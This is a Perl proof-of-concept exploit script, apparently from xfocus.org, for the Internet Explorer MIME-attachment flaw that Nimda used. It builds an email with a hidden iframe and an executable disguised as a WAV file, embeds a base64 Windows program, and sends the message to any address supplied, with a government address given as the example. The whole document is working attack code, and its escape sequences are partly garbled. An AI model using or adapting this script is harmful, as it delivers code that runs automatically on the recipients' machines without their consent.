IE 不能正确处理 MIME 格式邮件附件导致执行攻击者代码漏洞(NIMDA就是利用了此漏洞)

#!/usr/bin/perl #in bugtraq post User may be fooled to execute programs browsing with IE5.1 #so I write a script to exploit it, just a test, have fun :) # # http://www.xfocus.org use Mail::Sendmail; $email = $ARGV[0]; if($email eq "") { print " --=Outlook exploit=--/n/n"; print " http://www.xfocus.org/n/n"; print " for example:/n"; print "./iebug.pl someone/@whitehouse.gov/n"; }; $A="Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type=/"multipart/alternative/"; boundary=/"1/" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --1 Content-Type: multipart/alternative; boundary=/"2/" --2 Content-Type: text/html; charset=/"iso-8859-1/" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff> <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> I will execute a program, just a test :) --code by http://www.xfocus.org<BR> </BODY> </HTML> --2-- --1 Content-Type: audio/x-wav; name=/"joke.exe/" Content-Transfer-Encoding: base64 Content-ID: <THE-CID> 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 bGxvd2VkLgAAAAAAAAAAAAAAAAAABAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAUnVudGltZSBl cnJvciAlZCBhdCAlMDRYOiUwNFguAAABAAMAJgADACoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAACAA AABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIAAAACAgACAAAAAgACA AICAAACAgIAAwMDAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd3d3d3d3d3d3d3d3d3d3AHd3d3d3d3d3d3d3d3d3d8zM zMzMzMzMzMzMzMzMzHfIiIiIiIiIiIiIiIiIiIx3z//8d8/w8AAA8AAA8AAA DwD//HfP//x3z/h3jw8AAPAA8AAA8A/8d8/3iH///HfP+IeP AAAP/wAPDwDw//x3z/eHj//8d8/3iH//APAAAA/wAAAP/HfP+HiP //x3z/zMz/D/AADwDwAP8P/8d8/8zM///HfP//x3yIh4h3h3 iIeIiIh4iHiMd8h4iHiIiIiIeIiHiIeIjHd3fMzMzMzMzMzMzMzMzMx3f3zMzMzMzMzMzMzMzMzM AHd8zMzMzMzMzMzMzMzMzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP// /8AAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAA///AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAICAQAAQAAQDoAgAAAQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --1 "; %mail = (To => "$email", From => 'xixi@here.com', Header => "$A", Subject => 'test' ); sendmail(%mail) or die $Mail::Sendmail::error; print "exploit send OK :)/n";